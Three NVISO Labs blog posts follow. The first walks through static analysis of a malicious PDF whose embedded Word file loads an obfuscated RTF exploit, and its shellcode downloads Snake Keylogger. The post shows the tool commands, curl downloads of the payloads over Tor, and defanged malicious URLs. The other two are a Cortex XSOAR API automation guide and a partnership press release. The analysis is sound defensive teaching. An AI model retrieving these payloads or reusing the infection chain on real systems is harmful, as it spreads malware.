We start with an Ubuntu 20.04 LTS virtual machine (make sure that it is up-to-date by issuing the “sudo apt update” and “sudo apt upgrade” commands). We create a folder for the analysis: /home/testuser1/Malware (we usually create a folder per sample, with the current date in the folder name, like this: 20220324_twitter_pdf). testuser1 is the account we use; you will have another account name.

Inside that folder, we copy the malicious sample. To clearly mark the sample as (potentially) malicious, we give it the extension .vir. This also prevents accidental launching/execution of the sample. If you want to know more about handling malware samples, take a look at this SANS ISC diary entry.

Figure 1: The analysis machine with the PDF sample

The original name of the PDF document is REMMITANCE INVOICE.pdf, and we renamed it to REMMITANCE INVOICE.pdf.vir.
To conduct the analysis, we need tools that I develop and maintain. These are free, open-source tools, designed for static analysis of malware. Most of them are written in Python (a free, open-source programming language).
These tools can be found here and on GitHub.

PDF Analysis

To analyze a malicious PDF document like this one, we are not opening the PDF document with a PDF reader like Adobe Reader. Instead, we are using dedicated tools to dissect the document and find malicious code. This is known as static analysis.
Opening the malicious PDF document with a reader, and observing its behavior, is known as dynamic analysis.

Both are popular analysis techniques, and they are often combined. In this blog post, we are performing static analysis.

To install the tools from GitHub on our machine, we issue the following “git clone” command:

Figure 2: The “git clone” command fails to execute

As can be seen, this command fails, because on our pristine machine, git is not yet installed. Ubuntu is helpful and suggests the command to execute to install git:

sudo apt install git

Figure 3: Installing git
Figure 4: Installing git

When the DidierStevensSuite repository has been cloned, we will find a folder DidierStevensSuite in our working folder:

Figure 5: Folder DidierStevensSuite is the result of the clone command

With this repository of tools, we have different maldoc analysis tools at our disposal. Like PDF analysis tools.
pdfid.py and pdf-parser.py are two PDF analysis tools found in Didier Stevens’ Suite. pdfid is a simple triage tool, that looks for known keywords inside the PDF file, that are regularly associated with malicious activity. pdf-parser.py is able to parse a PDF file and identify basic building blocks of the PDF language, like objects.

To run pdfid.py on our Ubuntu machine, we can start the Python interpreter (python3), and give it the pdfid.py program as first parameter, followed by options and parameters specific for pdfid. The first parameter we provide for pdfid, is the name of the PDF document to analyze. Like this:

Figure 6: pdfid’s analysis report

In the report provided as output by pdfid, we see a bunch of keywords (first column) and a counter (second column). This counter simply indicates the frequency of the keyword: how many times does it appear in the analyzed PDF document?

As you can see, many counters are zero: keywords with zero counter do not appear in the analyzed PDF document. To make the report shorter, we can use option -n. This option excludes zero counters (n = no zeroes) from the report, like this:

Figure 7: pdfid’s condensed analysis report

The keywords that interest us the most, are the ones after the /Page keyword.
Keyword /EmbeddedFile means that the PDF contains an embedded file. This feature can be used for benign and malicious purposes. So we need to look into it.
Keyword /OpenAction means that the PDF reader should do something automatically, when the document is opened. Like launching a script.
Keyword /ObjStm means that there are stream objects inside the PDF document. Stream objects are special objects that contain other objects. These contained objects are compressed. pdfid is by nature a simple tool that is not able to recognize and handle compressed data. This has to be done with pdf-parser.py. Whenever you see stream objects in pdfid’s report (e.g., /ObjStm with a counter greater than zero), you have to realize that pdfid is unable to give you a complete report, and that you need to use pdf-parser to get the full picture. This is what we do with the following command:

Figure 8: pdf-parser’s statistical report

Option -a is used to have pdf-parser.py produce a report of all the different elements found inside the PDF document, together with keywords like the ones pdfid.py produces.
Option -O is used to instruct pdf-parser to decompress stream objects (/ObjStm) and include the contained objects into the statistical report. If this option is omitted, then pdf-parser’s report will be similar to pdfid’s report. To know more about this subject, we recommend this blog post.

In this report, we see again keywords like /EmbeddedFile. 1 is the counter (e.g., there is one embedded file) and 28 is the index of the PDF object for this embedded file.
New keywords that appear are /JS and /JavaScript. They indicate the presence of scripts (code) in the PDF document. The objects that represent these scripts are found (compressed) inside the stream objects (/ObjStm). That is why they did not appear in pdfid’s report, and why they do in pdf-parser’s report (when option -O is used).
JavaScript inside a PDF document is restricted in its interactions with the operating system resources: it can not access the file system, the registry, … .
Nevertheless, the included JavaScript can be malicious code (a legitimate reason for the inclusion of JavaScript in a PDF document, is input validation for PDF forms).
But we will first take a look at the embedded file. We do this by searching for the /EmbeddedFile keyword, like this:

Figure 9: Searching for embedded files

Notice that the search option -s is not case sensitive, and that you do not need to include the leading slash (/).
pdf-parser found one object that represents an embedded file: the object with index 28.
Notice the keywords /Filter /FlateDecode: this means that the embedded file is not included in the PDF document as-is, but that it has been “filtered” first (i.e., transformed). /FlateDecode indicates which transformation was applied: “deflation”, i.e., zlib compression.
To obtain the embedded file in its original form, we need to decompress the contained data (stream), by applying the necessary filters. This is done with option -f:

Figure 10: Decompressing the embedded file

The long string of data (it looks random) produced by pdf-parser when option -f is used, is the decompressed stream data in Python’s byte string representation. Notice that this data starts with PK: this is a strong indication that the embedded file is a ZIP container.
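As a side note, /FlateDecode can be reproduced with Python’s zlib module. This is a minimal sketch, assuming you have already written the raw (still compressed) stream of object 28 to a file; the filename is hypothetical:

import zlib

with open("object28_stream.bin", "rb") as f:   # hypothetical dump of the raw stream
    raw_stream = f.read()

decompressed = zlib.decompress(raw_stream)
print(decompressed[:2])                        # b'PK' -> the embedded file is a ZIP container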
We will now use option -d to dump (write) the contained file to disk. Since it is (potentially) malicious, we use again extension .vir.

Figure 11: Extracting the embedded file to disk

File embedded.vir is the embedded file.

Office document analysis

Since I was told that the embedded file is an Office document, we use a tool I developed for Office documents: oledump.py
But if you would not know what type the embedded file is, you would first want to determine this. We will actually have to do that later, with a downloaded file.

Now we run oledump.py on the embedded file we extracted: embedded.vir

Figure 12: No ole file was found

The output of oledump here is a warning: no ole file was found.
A bit of background can help understand what is happening here. Microsoft Office document files come in 2 major formats: ole files and OOXML files.
Ole files (official name: Compound File Binary Format) are the “old” file format: the binary format that was default until Office 2007 was released. Documents using this internal format have extensions like .doc, .xls, .ppt, …
OOXML files (Office Open XML) are the “new” file format. It’s the default since Office 2007. Its internal format is a ZIP container containing mostly XML files. Other contained file types that can appear are pictures (.png, .jpeg, …) and ole (for VBA macros for example). OOXML files have extensions like .docx, .xlsx, .docm, .xlsm, …
OOXML is based on another format: OPC.
oledump.py is a tool to analyze ole files. Most malicious Office documents nowadays use VBA macros. VBA macros are always stored inside ole files, even with the “new” format OOXML. OOXML documents that contain macros (like .docm), have one ole file inside the ZIP container (often named vbaProject.bin) that contains the actual VBA macros.
Now, let’s get back to the analysis of our embedded file: oledump tells us that it found no ole file inside the ZIP container (OPC).
This tells us 1) that the file is a ZIP container, and more precisely, an OPC file (thus most likely an OOXML file) and 2) that it does not contain VBA macros.
If the Office document contains no VBA macros, we need to look at the files that are present inside the ZIP container. This can be done with a dedicated tool for the analysis of ZIP files: zipdump.py
We just need to pass the embedded file as parameter to zipdump, like this:

Figure 13: Looking inside the ZIP container

Every line of output produced by zipdump, represents a contained file.
The presence of folder “word” tells us that this is a Word file, thus extension .docx (because it does not contain VBA macros).
When an OOXML file is created/modified with Microsoft Office, the timestamp of the contained files will always be 1980-01-01.
In the result we see here, there are many files that have a different timestamp: this tells us that this .docx file has been altered with a ZIP tool (like WinZip, 7zip, …) after it was saved with Office.
This is often an indicator of malicious intent.
If we are presented with an Office document that has been altered, it is recommended to take a look at the contained files that were most recently changed, as this is likely the file that has been tampered with for malicious purposes.
In our extracted sample, that contained file is the file with timestamp 2022-03-23 (that’s just a day ago, time of writing): file document.xml.rels.
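The timestamp check is also easy to script; a minimal Python sketch using the standard zipfile module (run against the embedded file we extracted earlier):

import zipfile

# list contained files whose timestamp differs from 1980-01-01, i.e. files
# that were likely modified with a ZIP tool after Office saved the document
with zipfile.ZipFile("embedded.vir") as z:
    for info in z.infolist():
        if info.date_time[:3] != (1980, 1, 1):
            print(info.date_time, info.filename)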
We can use zipdump.py to take a closer look at this file. We do not need to type its full name to select it; we can just use its index: 14 (this index is produced by zipdump, it is not metadata).
Using option -s, we can select a particular file for analysis, and with option -a, we can produce a hexadecimal/ascii dump of the file content. We start with this type of dump, so that we can first inspect the data and assure us that the file is indeed XML (it should be pure XML, but since it has been altered, we must be careful).

Figure 14: Hexadecimal/ascii dump of file document.xml.rels

This does indeed look like XML: thus we can use option -d to dump the file to the console (stdout):

Figure 15: Using option -d to dump the file content

There are many URLs in this output, and XML is readable to us humans, so we can search for suspicious URLs. But since this is XML without any newlines, it’s not easy to read. We might easily miss one URL.
Therefore, we will use a tool to help us extract the URLs: re-search.py
re-search.py is a tool that uses regular expressions to search through text files. And it comes with a small embedded library of regular expressions, for URLs, email addresses, …
If we want to use the embedded regular expression for URLs, we use option -n url.
Like this:

Figure 16: Extracting URLs

Notice that we use option -u to produce a list of unique URLs (remove duplicates from the output) and that we are piping 2 commands together. The output of command zipdump is provided as input to command re-search by using a pipe (|).
Many tools in Didier Stevens’ Suite accept input from stdin and produce output to stdout: this allows them to be piped together.
Most URLs in the output of re-search have schemas.openxmlformats.org as FQDN: these are normal URLs, to be expected in OOXML files. To help with this, re-search has an option to filter out URLs that are expected to be found in OOXML files. This is option -F with value officeurls.
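If you do not have re-search.py at hand, the same idea can be approximated in Python. This is a rough sketch: the regular expression is simplified, the path of the relationships file inside the ZIP container is the usual OOXML location (an assumption), and the filter simply drops the schemas.openxmlformats.org URLs:

import re
import zipfile

with zipfile.ZipFile("embedded.vir") as z:
    xml = z.read("word/_rels/document.xml.rels").decode("utf-8", "replace")

urls = set(re.findall(r"https?://[^\"'<>\s]+", xml))
for url in urls:
    if "schemas.openxmlformats.org" not in url:
        print(url)                 # the remaining URL(s) are the suspicious ones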

Figure 17: Filtered URLs

One URL remains: this is suspicious, and we should try to download the file for that URL.

Before we do that, we want to introduce another tool that can be helpful with the analysis of XML files: xmldump.py. xmldump parses XML files with Python’s built-in XML parser, and can represent the parsed output in different formats. One format is “pretty printing”: this makes the XML file more readable, by adding newlines and indentations. Pretty printing is achieved by passing parameter pretty to tool xmldump.py, like this:

Figure 18: Pretty print of file document.xml.rels

Notice that the <Relationship> element with the suspicious URL is the only one with attribute TargetMode=”External”.
This is an indication that this is an external template, that is loaded from the suspicious URL when the Office document is opened.
It is therefore important to retrieve this file.

Downloading a malicious file

We will download the file with curl. Curl is a very flexible tool to perform all kinds of web requests.
By default, curl is not installed in Ubuntu:

Figure 19: Curl is missing

But it can of course be installed:

Figure 20: Installing curl

And then we can use it to try to download the template. Often, we do not want to download that file using an IP address that can be linked to us or our organisation. We often use the Tor network to hide behind. We use option -x 127.0.0.1:9050 to direct curl to use a proxy, namely the Tor service running on our machine. And then we like to use option -D to save the headers to disk, and option -o to save the downloaded file to disk with a name of our choosing and extension .vir.
Notice that we also number the header and download files, as we know from experience, that often several attempts will be necessary to download the file, and that we want to keep the data of all attempts.

Figure 21: Downloading with curl over Tor fails

This fails: the connection is refused. That’s because port 9050 is not open: the Tor service is not installed. We need to install it first:

Figure 22: Installing Tor

Next, we try again to download over Tor:

Figure 23: The download still fails

The download still fails, but with another error. The CONNECT keyword tells us that curl is trying to use an HTTP proxy, and Tor uses a SOCKS5 proxy. I used the wrong option: instead of option -x, I should be using option --socks5 (-x is for HTTP proxies).

Figure 24: The download seems to succeed

But taking a closer look at the downloaded file, we see that it is empty:

Figure 25: The downloaded file is empty, and the headers indicate status 301

The content of the headers file indicates status 301: the file was permanently moved.
Curl will not automatically follow redirections. This has to be enabled with option -L, let’s try again:

Figure 26: Using option -L

And now we have indeed downloaded a file:

Figure 27: Download result

Notice that we are using index 2 for the downloaded files, so as not to overwrite the first downloaded files.
Downloading over Tor will not always work: some servers will refuse to serve the file to Tor clients.
And downloading with Curl can also fail, because of the User Agent String. The User Agent String is a header that Curl includes whenever it performs a request: this header indicates that the request was done by curl. Some servers are configured to only serve files to clients with the “proper” User Agent String, like the ones used by Office or common web browsers.
If you suspect that this is the case, you can use option -A to provide an appropriate User Agent String.
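For completeness, the same download could be scripted in Python with the requests library (plus the PySocks extra for SOCKS5 support). This is only a sketch: the URL is a placeholder and the User Agent String is an arbitrary browser-like value:

import requests

proxies = {"http": "socks5h://127.0.0.1:9050",   # Tor SOCKS5 proxy
           "https": "socks5h://127.0.0.1:9050"}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}

# requests follows redirects by default, unlike curl without -L
resp = requests.get("https://example.com/template", headers=headers,
                    proxies=proxies, timeout=60)

with open("template2.vir", "wb") as f:
    f.write(resp.content)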

As the downloaded file is a template, we expect it is an Office document, and we use oledump.py to analyze it:

Figure 28: Analyzing the downloaded file with oledump fails

But this fails. Oledump does not recognize the file type: the file is not an ole file or an OOXML file.
We can use Linux command file to try to identify the file type based on its content:

Figure 29: Command file tells us this is pure text

If we are to believe this output, the file is a pure text file.
Let’s do a hexadecimal/ascii dump with command xxd. Since this will produce many pages of output, we pipe the output to the head command, to limit the output to the first 10 lines:

Figure 30: Hexadecimal/ascii dump of the downloaded file

RTF document analysis

The file starts with {\rt : this is a deliberately malformed RTF file. Rich Text Format is a file format for Word documents that is pure text. The format does not support VBA macros. Most of the time, malicious RTF files perform malicious actions through exploits.
Proper RTF files should start with {\rtf1. The fact that this file starts with {\rt is a clear indication that the file has been tampered with (or generated with a maldoc generator): Word will not produce files like this. However, Word’s RTF parser is forgiving enough to accept files like this.

Didier Stevens’ Suite contains a tool to analyze RTF files: rtfdump.py
By default, running rtfdump.py on an RTF file produces a lot of output:

Figure 31: Parsing the RTF file

The most important fact we know from this output is that this is indeed an RTF file, since rtfdump was able to parse it.
As RTF files often contain exploits, they often use embedded objects. Filtering rtfdump’s output for embedded objects can be done with option -O:

Figure 32: There are no embedded objects

No embedded objects were found. Then we need to look at the hexadecimal data: since RTF is a text format, binary data is encoded with hexadecimal digits. Looking back at figure 31, we see that the second entry (number 2) contains 8349 hexadecimal digits (h=8349). That’s the first entry we will inspect further.
Notice that 8349 is an uneven number, and that encoding a single byte requires 2 hexadecimal digits. This is an indication that the RTF file is obfuscated, to thwart analysis.
Using option -s, we can select entry 2:

Figure 33: Selecting the second entry

If you are familiar with the internals of RTF files, you would notice that the long, uninterrupted sequences of curly braces are suspicious: it’s another sign of obfuscation.
Let’s try to decode the hexadecimal data inside entry 2, by using option -H

Figure 34: Hexadecimal decoding

After some random-looking bytes and a series of NULL bytes, we see a lot of FF bytes. This is typical of ole files. Ole files start with a specific set of bytes, known as a magic header: D0 CF 11 E0 A1 B1 1A E1.
We cannot find this sequence in the data; however, we find a sequence that looks similar: 0D 0C F1 1E 0A 1B 11 AE 10 (starting at position 0x46).
This is almost the same as the magic header, but shifted by one hexadecimal digit. This means that the RTF file is obfuscated with a method that has not been foreseen in the deobfuscation routines of rtfdump. Remember that the number of hexadecimal digits is uneven: this is the result. Should rtfdump be able to properly deobfuscate this RTF file, then the number would be even.
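To make the “shifted by one hexadecimal digit” idea concrete, here is a small Python sketch using a hypothetical excerpt of the hexadecimal data; dropping the first digit re-aligns the bytes to the ole magic header:

import binascii

hexdata = "0D0CF11E0A1B11AE10"     # hypothetical excerpt of the obfuscated hex data
shifted = hexdata[1:]              # drop the first hex digit
if len(shifted) % 2:               # odd number of digits: pad to whole bytes
    shifted += "0"
print(binascii.unhexlify(shifted)) # b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00'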
But that is not a problem: I’ve foreseen this, and there is an option in rtfdump to shift all hexadecimal strings with one digit. This is option -S:

Figure 35: Using option -S to manually deobfuscate the file

We have different output now. Starting at position 0x47, we now see the correct magic header: D0 CF 11 E0 A1 B1 1A E1
And scrolling down, we see the following:

Figure 36: ole file directory entries (UNICODE)

We see UNICODE strings RootEntry and ole10nAtiVE.
Every ole file contains a RootEntry.
And ole10native is an entry for embedded data. It should all be lower case: the mixing of uppercase and lowercase is another indicator of malicious intent.

As we have now managed to direct rtfdump to properly decode this embedded olefile, we can use option -i to help with the extraction:

Figure 37: Extraction of the olefile fails

Unfortunately, this fails: there is still some unresolved obfuscation. But that is not a problem; we can perform the extraction manually. For that, we locate the start of the ole file (position 0x47) and use option -c to “cut” it out of the decoded data, like this:

Figure 38: Hexadecimal/ascii dump of the embedded ole file

With option -d, we can perform a dump (binary data) of the ole file and write it to disk:

Figure 39: Writing the embedded ole file to disk

We use oledump to analyze the extracted ole file (ole.vir):

Figure 40: Analysis of the extracted ole file

It succeeds: it contains one stream.
Let’s select it for further analysis:

Figure 41: Content of the stream

This binary data looks random.
Let’s use option -S to extract strings (this option is like the strings command) from this binary data:

Figure 42: Extracting strings

There’s nothing recognizable here.

Let’s summarize where we are: we extracted an ole file from an RTF file that was downloaded by a .docx file embedded in a PDF file. When we say it like this, we can only think that this is malicious.

Shellcode analysis

Remember that malicious RTF files very often contain exploits? Exploits often use shellcode. Let’s see if we can find shellcode.
To achieve this, we are going to use scdbg, a shellcode emulator developed by David Zimmer.
First we are going to write the content of the stream to a file:

Figure 43: Writing the (potential) shellcode to disk

scdbg is a free, open source tool that emulates 32-bit shellcode designed to run on the Windows operating system. Started as a project running on Windows and Linux, it is now further developed for Windows only.

Figure 44: Scdbg

We download Windows binaries for scdbg:

Figure 45: Scdbg binary files

And extract executable scdbg.exe to our working directory:

Figure 46: Extracting scdbg.exe
Figure 47: Extracting scdbg.exe

Although scdbg.exe is a Windows executable, we can run it on Ubuntu via Wine:

Figure 48: Trying to use wine

Wine is not installed, but by now, we know how to install tools like this:

Figure 49: Installing wine
Figure 50: Tasting wine 😊

We can now run scdbg.exe like this:

wine scdbg.exe

scdbg requires some options: -f sc.vir to provide it with the file to analyze

Shellcode has an entry point: the address from where it starts to execute. By default, scdbg starts to emulate from address 0. Since this is an exploit (we have not yet recognized which exploit, but that does not prevent us from trying to analyze the shellcode), its entry point will not be address 0. At address 0, we should find a data structure (that we have not identified) that is exploited.
To summarize: we don’t know the entry point, but it’s important to know it.
Solution: scdbg.exe has an option to try out all possible entry points. Option -findsc.
And we add one more option to produce a report: -r.

Let’s try this:

Figure 51: Running scdbg via wine

This looks good: after a bunch of messages and warnings from Wine that we can ignore, scdbg presents us with 8 (0 through 7) possible entry points. We select the first one: 0

Figure 52: Trying entry point 0 (address 0x95)

And we are successful: scdbg.exe was able to emulate the shellcode, and show the different Windows API calls performed by the shellcode. The most important one for us analysts, is URLDownloadToFile. This tells us that the shellcode downloads a file and writes it to disk (name vbc.exe).
Notice that scdbg did emulate the shellcode: it did not actually execute the API calls, no files were downloaded or written to disk.

Although we don’t know which exploit we are dealing with, scdbg was able to find the shellcode and emulate it, providing us with an overview of the actions executed by the shellcode.
The shellcode is obfuscated: that is why we did not see strings like the URL and filename when extracting the strings (see figure 42). But by emulating the shellcode, scdbg also deobfuscates it.

We can now use curl again to try to download the file:

Figure 53: Downloading the executable

And it is indeed a Windows executable (.NET):

Figure 54: Headers
Figure 55: Running command file on the downloaded file

To determine what we are dealing with, we try to look it up on VirusTotal.
First we calculate its hash:

Figure 56: Calculating the MD5 hash
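The hash can just as well be computed in Python with hashlib (a minimal sketch; the filename is a placeholder for whatever name you gave the downloaded executable):

import hashlib

with open("downloaded_2.vir", "rb") as f:     # placeholder filename
    print(hashlib.md5(f.read()).hexdigest())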

And then we look it up through its hash on VirusTotal:

Figure 57: VirusTotal report

From this report, we conclude that the executable is Snake Keylogger.

If the file would not be present on VirusTotal, we could upload it for analysis, provided we accept the fact that we can potentially alert the criminals that we have discovered their malware.

In the video for this blog post, there’s a small bonus at the end, where we identify the exploit: CVE-2017-11882.

Conclusion
This is a long blog post, not only because of the different layers of malware in this sample. But also because in this blog post, we provide more context and explanations than usual.
We explained how to install the different tools that we used.
We explained why we chose each tool, and why we execute each command.
There are many possible variations of this analysis, and other tools that can be used to achieve similar results. I, for example, would pipe more commands together.
The important aspect of static analysis like this one is to use dedicated tools. Don’t use a PDF reader to open the PDF, don’t use Office to open the Word document, … Because if you do, you might execute the malicious code.
We have seen malicious documents like this before, and written blog posts for them, like this one. The sample we analyzed here has more “layers” than these older maldocs, making the analysis more challenging.

In that blog post, we also explain how this kind of malicious document “works”, by also showing the JavaScript and by opening the document inside a sandbox.

IOCs

Type Value
PDF sha256: 05dc0792a89e18f5485d9127d2063b343cfd2a5d497c9b5df91dc687f9a1341d
RTF sha256: 165305d6744591b745661e93dc9feaea73ee0a8ce4dbe93fde8f76d0fc2f8c3f
EXE sha256: 20a3e59a047b8a05c7fd31b62ee57ed3510787a979a23ce1fde4996514fae803
URL hxxps://vtaurl[.]com/IHytw
URL hxxp://192[.]227[.]196[.]211/FRESH/fresh[.]exe

These files can be found on VirusTotal, MalwareBazaar and Malshare.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Cortex XSOAR Tips & Tricks – Using The API In Automations

By: wstinkens

Introduction

When developing automations in Cortex XSOAR, you can use the Script Helper in the built-in Cortex XSOAR IDE to view all the scripts and commands available for automating tasks. When there is no script or command available for the specific task you want to automate, you can use the Cortex XSOAR API to automate most tasks available in the web interface.

In this blogpost we will show you how to discover the API endpoints in Cortex XSOAR for specific tasks and which options are available to use them in your own custom automations. As an example we will automate replacing evidences in the incident evidence board.

To enable you to use the Cortex XSOAR API in your own automations, we have created a nitro_execute_http_request function which is available on the NVISO GitHub:

https://github.com/NVISOsecurity/blogposts/blob/master/CortexXSOAR/nitro_execute_http_request.py

Cortex XSOAR API Endpoints

Before you can use the Cortex XSOAR API in your automation, you will need to know which API endpoints are available. The Cortex XSOAR API documentation can be found in Settings > Integrations > API Keys:

Here you can see the following links:

  • View Cortex XSOAR API: Open the API documentation on the XSOAR server
  • Download Cortex XSOAR API Guide: Download a PDF with the API documentation
  • Download REST swagger file: Download a JSON file which can be imported into a Swagger editor

You can use these links to view all the documented API endpoints for Cortex XSOAR, with their paths, parameters and responses, including example request bodies. Importing the Swagger JSON file into a Swagger Editor or Postman will allow you to interact with the API for testing without writing a single line of code.

Using The API In Automations

Once you have determined the Cortex XSOAR API endpoint to use, you have 2 options available for use in an automation.

The first option is using the internalHttpRequest method of the demisto class. This allows you to do an internal HTTP request on the Cortex XSOAR server. It is the faster of the two options, but there is a permissions limitation when using it in playbooks. The request runs with the permissions of the executing user when a command is executed manually (such as via the War Room or when browsing a widget). When run via a playbook, it runs as a read-only user with limited permissions, isolated to the current incident only.

The second option for using the API in automations is the Demisto REST API integration. This integration is part of the Demisto REST API content pack available in the Cortex XSOAR Marketplace.

After installing the content pack, you will need to create an API key in Settings > Integrations > API Keys:

Click on Get Your Key, give it a name and click Generate key:

Copy your key and store it in a secure location:

If you have a multi-tenant environment, you will need to synchronize this key to the different accounts.

Next you will need to configure the Demisto REST API integration:

Click Add instance and copy the API key and click Test to verify that the integration is working correctly:

You will now be able to use the following commands in your automations:

  • demisto-api-delete: send HTTP DELETE request
  • demisto-api-download: Download files from XSOAR server
  • demisto-api-get: send HTTP GET requests
  • demisto-api-multipart: Send HTTP Multipart request to upload files to XSOAR server
  • demisto-api-post: send HTTP POST request
  • demisto-api-put: send HTTP PUT request
  • demisto-delete-incidents: Delete XSOAR incidents

For HTTP requests that only require read permissions, you should use the internalHttpRequest method of the demisto class, because it does not require an additional integration and has better performance. From the Demisto REST API integration, you will mostly be using the demisto-api-post command for doing HTTP POST requests in your automations when write permissions are required.

nitro_execute_http_request()

Similar to the demisto.executeCommand method, the demisto.internalHttpRequest does not throw an error when the request fails. Therefore, we have created a nitro_execute_http_request wrapper function to add error handling which you can use in your own custom automations.

import json


def nitro_execute_http_request(method: str, uri: str, body: dict = None) -> dict:
    """
    Send internal http requests to XSOAR server
    :type method: ``str``
    :param method: HTTP Method (GET / POST / PUT / DELETE)
    :type uri: ``str``
    :param uri: Request URI
    :type body: ``dict``
    :param body: Body of request
    :return: dict of response body
    :rtype: ``dict``
    """

    response = demisto.internalHttpRequest(method, uri, body)
    response_body = json.loads(response.get('body'))

    if response.get('statusCode') != 200:
        raise Exception(f"Func: nitro_execute_http_request; {response.get('status')}: {response_body.get('detail')}; "
                        f"error: {response_body.get('error')}")
    else:
        return response_body

When you use this function to call demisto.internalHttpRequest, it will raise an exception when the HTTP request fails:

try:
    uri = "/evidence/search"
    method = "POST"
    body = {"incidentID": '9999999'}

    return_results(nitro_execute_http_request(method=method, uri=uri, body=body))
except Exception as ex:
    return_error(f'Failed to execute nitro_execute_http_request. Error: {str(ex)}')

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_execute_http_request in all your custom automations.

Incident Evidences Example

To provide you an example of how to use the API in an automation, we will show how to replace evidences in the incident Evidence Board in Cortex XSOAR. We will build on the example of the previous post in this series where we add evidences based on the tags of an entry in the war room:

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

entry_ids = [result.get('ID') for result in results]

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': 'Example Evidence'})

If you search the script helper in the built-in IDE, you will see that there is already an AddEvidence automation:

When using this command in a playbook to add evidences to the incident Evidence Board, you will get duplicates when the playbook is run multiple times. This could lead to confusion for the SOC analyst and should be avoided. A replace argument is not available in the AddEvidence command, but we can implement this using the Cortex XSOAR API.

To implement the replace functionality, we will first need to search for an entry in the incident Evidence Board with the same description, delete it and then add it again. There are no built-in automations available that support this but it is supported by the Cortex XSOAR API.

If we search the API documentation, we can see the following API Endpoints:

  • /evidence/search
  • /evidence/delete

To search for evidences with the same description, we have created a function:

def nitro_get_incident_evidences(incident_id: str, query: str = None) -> list:
    """
    Get list of incident evidences
    :type incident_id: ``str``
    :param incident_id: XSOAR incident id
    :type query: ``str``
    :param query: query for evidences
    :return: list of evidences
    :rtype: ``list``
    """

    uri = "/evidence/search"
    body = {"incidentID": incident_id}
    if query:
        body.update({"filter": {"query": query}})

    results = nitro_execute_http_request(method='POST', uri=uri, body=body)

    return results.get('evidences', [])

Because searching for evidences does not require write permissions, this function uses our wrapper around the faster internalHttpRequest method of the demisto class.

To delete the evidences we have created a second function which uses the demisto-api-post command because write permissions are required:

def nitro_delete_incident_evidence(evidence_id: str):
    """
    Delete incident evidence
    :type evidence_id: ``str``
    :param evidence_id: XSOAR evidence id
    """

    uri = '/evidence/delete'
    body = {'evidenceID': evidence_id}

    nitro_execute_command(command='demisto-api-post', args={"uri": uri, "body": body})

We use the nitro_execute_command function we discussed in a previous post in this series to add error handling.
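For readers who have not read that post: below is a minimal sketch of what such a wrapper could look like. It is an illustrative assumption based on how the function is used here, not the exact implementation from the earlier post; it wraps demisto.executeCommand and raises an exception on error entries, using the is_error and get_error helpers from CommonServerPython.

def nitro_execute_command(command: str, args: dict = None) -> list:
    """
    Illustrative sketch: execute an XSOAR command with added error handling,
    since demisto.executeCommand does not throw when the command fails.
    :type command: ``str``
    :param command: name of the automation or integration command to run
    :type args: ``dict``
    :param args: arguments passed to the command
    :return: list of result entries returned by the command
    :rtype: ``list``
    """

    results = demisto.executeCommand(command, args or {})

    # is_error/get_error are CommonServerPython helpers that inspect the
    # returned entries for error entries.
    if is_error(results):
        raise Exception(f"Func: nitro_execute_command; command: {command}; "
                        f"error: {get_error(results)}")

    return results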

We use these two functions to first search for evidences with the same description and delete them, and then add the tagged war room entries to the incident Evidence Board again.

description = 'Example Evidence'
incident_id = demisto.incident().get('id')

query = f"description:\"{description}\""
evidences = nitro_get_incident_evidences(incident_id=incident_id, query=query)

for evidence in evidences:
    nitro_delete_incident_evidence(evidence.get('id'))

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

entry_ids = [result.get('ID') for result in results]

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': description })

References

https://xsoar.pan.dev/docs/concepts/xsoar-ide#the-script-helper

https://xsoar.pan.dev/marketplace/details/DemistoRESTAPI

https://xsoar.pan.dev/docs/reference/api/demisto-class#internalhttprequest

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can reach Wouter via his LinkedIn page.


Want to learn more about SOAR? Sign up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.
https://forms.office.com/r/dpuep3PL5W

✇ NVISO Labs

NVISO achieves Palo Alto Networks Cortex eXtended Managed Detection and Response (XMDR) Specialization

By: Carola Wondrak

Brussels, March 23, 2022 – Managed Security Services provider NVISO today announced it has become a Palo Alto Networks Cortex® XMDR Specialization partner. NVISO joins a select group of channel partners who have earned this distinction through operational capabilities and fulfillment of business requirements and completion of technical, sales enablement and specialization examinations. The Cortex XMDR Specialization will enable NVISO to combine the power of the best-in-class Cortex XDR™ detection and response solution with their managed services offerings — helping customers worldwide streamline security operations center (SOC) operations and quickly mitigate cyberthreats.

 “We are excited to partner with Palo Alto Networks to provide our customers with next-generation security technology for our services,” said Carola Wondrak, Business Development Lead at NVISO. Erik Van Buggenhout, Partner at NVISO emphasizes this further: “NVISO’s priority has always been delivering world-class cyber security services to our clients that are not bound to particular technology products or vendors. This being said, we consider Palo Alto Cortex a best-in-class, leading, platform which we rely on at the core of our managed services. We are thus very excited to be recognized as an XMDR Specialization partner.”

“Organizations need effective detection and response across the network, endpoint, and cloud but managing today’s threats effectively is a massive undertaking,” said Karl Soderlund, senior vice president, Worldwide Channel Sales at Palo Alto Networks. “NVISO’s commitment to attain the Cortex XMDR Specialization will give their managed security services customers peace of mind that the services they are choosing will mitigate security gaps and relieve the day-to-day burden of security operations for customers with 24/7 coverage.”

